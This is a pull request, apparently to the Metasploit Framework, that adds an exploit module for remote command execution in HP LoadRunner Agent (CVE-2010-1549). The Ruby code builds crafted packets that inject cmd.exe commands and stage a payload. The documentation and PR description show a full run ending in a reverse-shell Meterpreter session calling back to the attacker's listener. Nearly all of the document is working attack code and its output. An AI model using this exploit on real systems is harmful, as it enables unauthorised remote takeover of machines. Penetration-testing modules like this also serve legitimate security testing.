### PR TITLE
Added exploit module for HP LoadRunner command exec vuln CVE-2010-1549.

### DIFF
--- a/documentation/modules/exploit/windows/misc/hp_loadrunner_magentproc_cmdexec.md
+++ b/documentation/modules/exploit/windows/misc/hp_loadrunner_magentproc_cmdexec.md
@@ -1,0 +1,119 @@
+HP Mercury LoadRunner Agent magentproc.exe Remote Command Execution (CVE-2010-1549)
+
+This module exploits a remote command execution vulnerablity in HP LoadRunner before 9.50 and also HP Performance Center before 9.50. By sending a specially crafted packet, an attacker can execute commands remotely. The service is vulnerable provided the Secure Channel feature is disabled (default).
+
+## Vulnerable Application
+
+HP LoadRunner 9.50 or below.
+
+Sources unknown - written during blind pentest against remote target.
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: ```use exploit/windows/misc/hp_loadrunner_magentproc_cmdexec```
+4. Do: ```set RHOST victim```
+5. Do: ```run```
+6. You should get a shell.
+
+## Options
+
+Default RPORT 54345.
+
+## Scenarios
+
+### Win7 OS with unknown vulnerable release of LoadRunner Agent
+
+```
+msf > use exploit/windows/misc/hp_loadrunner_magentproc_cmdexec
+msf exploit(hp_loadrunner_magentproc_cmdexec) > set RHOST victim
+RHOST => victim
+msf exploit(hp_loadrunner_magentproc_cmdexec) > exploit
+
+[*] Started reverse TCP handler on 1.1.1.1:4444
+[*] victim:54345 - Sending payload...
+[*] victim:54345 - Command Stager progress -   1.47% done (1499/102292 bytes)
+[*] victim:54345 - Command Stager progress -   2.93% done (2998/102292 bytes)
+[*] victim:54345 - Command Stager progress -   4.40% done (4497/102292 bytes)
+[*] victim:54345 - Command Stager progress -   5.86% done (5996/102292 bytes)
+[*] victim:54345 - Command Stager progress -   7.33% done (7495/102292 bytes)
+[*] victim:54345 - Command Stager progress -   8.79% done (8994/102292 bytes)
+[*] victim:54345 - Command Stager progress -  10.26% done (10493/102292 bytes)
+[*] victim:54345 - Command Stager progress -  11.72% done (11992/102292 bytes)
+[*] victim:54345 - Command Stager progress -  13.19% done (13491/102292 bytes)
+[*] victim:54345 - Command Stager progress -  14.65% done (14990/102292 bytes)
+[*] victim:54345 - Command Stager progress -  16.12% done (16489/102292 bytes)
+[*] victim:54345 - Command Stager progress -  17.58% done (17988/102292 bytes)
+[*] victim:54345 - Command Stager progress -  19.05% done (19487/102292 bytes)
+[*] victim:54345 - Command Stager progress -  20.52% done (20986/102292 bytes)
+[*] victim:54345 - Command Stager progress -  21.98% done (22485/102292 bytes)
+[*] victim:54345 - Command Stager progress -  23.45% done (23984/102292 bytes)
+[*] victim:54345 - Command Stager progress -  24.91% done (25483/102292 bytes)
+[*] victim:54345 - Command Stager progress -  26.38% done (26982/102292 bytes)
+[*] victim:54345 - Command Stager progress -  27.84% done (28481/102292 bytes)
+[*] victim:54345 - Command Stager progress -  29.31% done (29980/102292 bytes)
+[*] victim:54345 - Command Stager progress -  30.77% done (31479/102292 bytes)
+[*] victim:54345 - Command Stager progress -  32.24% done (32978/102292 bytes)
+[*] victim:54345 - Command Stager progress -  33.70% done (34477/102292 bytes)
+[*] victim:54345 - Command Stager progress -  35.17% done (35976/102292 bytes)
+[*] victim:54345 - Command Stager progress -  36.64% done (37475/102292 bytes)
+[*] victim:54345 - Command Stager progress -  38.10% done (38974/102292 bytes)
+[*] victim:54345 - Command Stager progress -  39.57% done (40473/102292 bytes)
+[*] victim:54345 - Command Stager progress -  41.03% done (41972/102292 bytes)
+[*] victim:54345 - Command Stager progress -  42.50% done (43471/102292 bytes)
+[*] victim:54345 - Command Stager progress -  43.96% done (44970/102292 bytes)
+[*] victim:54345 - Command Stager progress -  45.43% done (46469/102292 bytes)
+[*] victim:54345 - Command Stager progress -  46.89% done (47968/102292 bytes)
+[*] victim:54345 - Command Stager progress -  48.36% done (49467/102292 bytes)
+[*] victim:54345 - Command Stager progress -  49.82% done (50966/102292 bytes)
+[*] victim:54345 - Command Stager progress -  51.29% done (52465/102292 bytes)
+[*] victim:54345 - Command Stager progress -  52.75% done (53964/102292 bytes)
+[*] victim:54345 - Command Stager progress -  54.22% done (55463/102292 bytes)
+[*] victim:54345 - Command Stager progress -  55.69% done (56962/102292 bytes)
+[*] victim:54345 - Command Stager progress -  57.15% done (58461/102292 bytes)
+[*] victim:54345 - Command Stager progress -  58.62% done (59960/102292 bytes)
+[*] victim:54345 - Command Stager progress -  60.08% done (61459/102292 bytes)
+[*] victim:54345 - Command Stager progress -  61.55% done (62958/102292 bytes)
+[*] victim:54345 - Command Stager progress -  63.01% done (64457/102292 bytes)
+[*] victim:54345 - Command Stager progress -  64.48% done (65956/102292 bytes)
+[*] victim:54345 - Command Stager progress -  65.94% done (67455/102292 bytes)
+[*] victim:54345 - Command Stager progress -  67.41% done (68954/102292 bytes)
+[*] victim:54345 - Command Stager progress -  68.87% done (70453/102292 bytes)
+[*] victim:54345 - Command Stager progress -  70.34% done (71952/102292 bytes)
+[*] victim:54345 - Command Stager progress -  71.81% done (73451/102292 bytes)
+[*] victim:54345 - Command Stager progress -  73.27% done (74950/102292 bytes)
+[*] victim:54345 - Command Stager progress -  74.74% done (76449/102292 bytes)
+[*] victim:54345 - Command Stager progress -  76.20% done (77948/102292 bytes)
+[*] victim:54345 - Command Stager progress -  77.67% done (79447/102292 bytes)
+[*] victim:54345 - Command Stager progress -  79.13% done (80946/102292 bytes)
+[*] victim:54345 - Command Stager progress -  80.60% done (82445/102292 bytes)
+[*] victim:54345 - Command Stager progress -  82.06% done (83944/102292 bytes)
+[*] victim:54345 - Command Stager progress -  83.53% done (85443/102292 bytes)
+[*] victim:54345 - Command Stager progress -  84.99% done (86942/102292 bytes)
+[*] victim:54345 - Command Stager progress -  86.46% done (88441/102292 bytes)
+[*] victim:54345 - Command Stager progress -  87.92% done (89940/102292 bytes)
+[*] victim:54345 - Command Stager progress -  89.39% done (91439/102292 bytes)
+[*] victim:54345 - Command Stager progress -  90.86% done (92938/102292 bytes)
+[*] victim:54345 - Command Stager progress -  92.32% done (94437/102292 bytes)
+[*] victim:54345 - Command Stager progress -  93.79% done (95936/102292 bytes)
+[*] victim:54345 - Command Stager progress -  95.25% done (97435/102292 bytes)
+[*] victim:54345 - Command Stager progress -  96.72% done (98934/102292 bytes)
+[*] victim:54345 - Command Stager progress -  98.15% done (100400/102292 bytes)
+[*] victim:54345 - Command Stager progress -  99.55% done (101827/102292 bytes)
+[*] victim:54345 - Command Stager progress - 100.00% done (102292/102292 bytes)
+[*] Sending stage (179267 bytes) to 2.2.2.2
+[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:55556) at 2017-11-09 03:53:08 +1100
+
+meterpreter > sysinfo
+Computer        : TARGET
+OS              : Windows 7 (Build 7601, Service Pack 1).
+Architecture    : x64
+System Language : en_AU
+Domain          : DOMAIN
+Logged On Users : 3
+Meterpreter     : x86/windows
+meterpreter >
+Background session 1? [y/N]
+
+```

--- a/modules/exploits/windows/misc/hp_loadrunner_magentproc_cmdexec.rb
+++ b/modules/exploits/windows/misc/hp_loadrunner_magentproc_cmdexec.rb
@@ -1,0 +1,99 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::CmdStager
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "HP Mercury LoadRunner Agent magentproc.exe Remote Command Execution",
+      'Description'    => %q{
+        This module exploits a remote command execution vulnerablity in HP LoadRunner before 9.50
+        and also HP Performance Center before 9.50. By sending a specially crafted packet, an
+        attacker can execute commands remotely. The service is vulnerable provided the Secure
+        Channel feature is disabled (default).
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Unknown', # Original discovery # From Tenable Network Security
+          'aushack'  # metasploit module
+        ],
+      'References'     =>
+        [
+          ['CVE', '2010-1549'],
+          ['ZDI', '10-080'],
+          ['BID', '39965'],
+          #['OSVDB', ''], # ?
+          ['URL', 'https://support.hpe.com/hpsc/doc/public/display?docId=c00912968']
+        ],
+      'Payload'        => { 'BadChars' => "\x0d\x0a\x00" },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          # Note: software reportedly supports Linux - may also be vulnerable.
+          ['Windows (Dropper)',
+          'Platform'   => 'win',
+          'Arch'       => [ARCH_X86, ARCH_X64]
+          ],
+        ],
+      'Privileged'     => false,
+      'Stance'         => Msf::Exploit::Stance::Aggressive,
+      'DisclosureDate' => "May 06 2010",
+      'DefaultTarget'  => 0))
+
+      register_options([Opt::RPORT(54345)])
+  end
+
+  def autofilter
+    true
+  end
+
+  def execute_command(cmd, _opts = {})
+    guid = Rex::Text.encode_base64(Rex::Text.rand_text_alphanumeric(17))
+    randstr = Rex::Text.rand_text_alpha(16)
+    server_name = Rex::Text.rand_text_alpha(7)
+    server_ip = datastore['LHOST']
+    server_port = Rex::Text.rand_text_numeric(4)
+    # If linux is one day supported, cmd1 = /bin/sh and cmd2 = -c cmd
+    cmd1 = "C:\\Windows\\system32\\cmd.exe"
+    cmd2 = "/C \"#{cmd}\""
+
+    pkt1 = [0x19].pack('N') + guid + "0"
+
+    pkt2 = [0x6].pack('N') + [0x0].pack('N') + "(-server_type=8)(-server_name=#{server_name})(-server_full_name=#{server_name})"
+    pkt2 << "(-server_ip_name=#{server_ip})(-server_port=#{server_port})(-server_fd_secondary=4)(-guid_identifier=#{guid})\x00\x00"
+    pkt2 << [0x7530].pack('N')
+
+    pkt3 = [4 + pkt2.length].pack('N') + pkt2
+
+    pkt4 = [0x1c].pack('N') + [0x05].pack('N') + [0x01].pack('N') + randstr + pkt3
+
+    pkt5 = [pkt4.length].pack('N') + pkt4
+
+    pkt6 = [0x437].pack('N') + [0x0].pack('N') + [0x31].pack('N') + [1].pack('N') + [0x31000000].pack('N')
+    pkt6 << [cmd1.length].pack('N') + cmd1 + "\x00" + [cmd2.length].pack('N') + cmd2 + [0x0].pack('N') + [0x0].pack('N')
+
+    pkt7 = [4 + pkt6.length].pack('N') + pkt6
+
+    pkt8 = [0x18].pack('N') + [0x04].pack('N') + randstr + pkt7
+
+    pkt9 = [pkt8.length].pack('N') + pkt8
+
+    sploit = pkt1 + pkt5 + pkt9
+
+    connect
+    sock.put(sploit)
+    disconnect
+ end
+
+  def exploit
+      print_status("Sending payload...")
+      execute_cmdstager(linemax: 1500)
+  end
+end


### PR DESCRIPTION
New exploit module.

## Verification
```
msf > use exploit/windows/misc/hp_loadrunner_magentproc_cmdexec
msf exploit(hp_loadrunner_magentproc_cmdexec) > set RHOST victim
RHOST => victim
msf exploit(hp_loadrunner_magentproc_cmdexec) > exploit

[*] Started reverse TCP handler on 1.1.1.1:4444
[*] victim:54345 - Sending payload...
[*] victim:54345 - Command Stager progress -   1.47% done (1499/102292 bytes)
...
[*] victim:54345 - Command Stager progress - 100.00% done (102292/102292 bytes)
[*] Sending stage (179267 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:55556) at 2017-11-09 03:53:08 +1100

meterpreter > sysinfo
Computer        : TARGET
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_AU
Domain          : DOMAIN
Logged On Users : 3
Meterpreter     : x86/windows
meterpreter >
Background session 1? [y/N]
```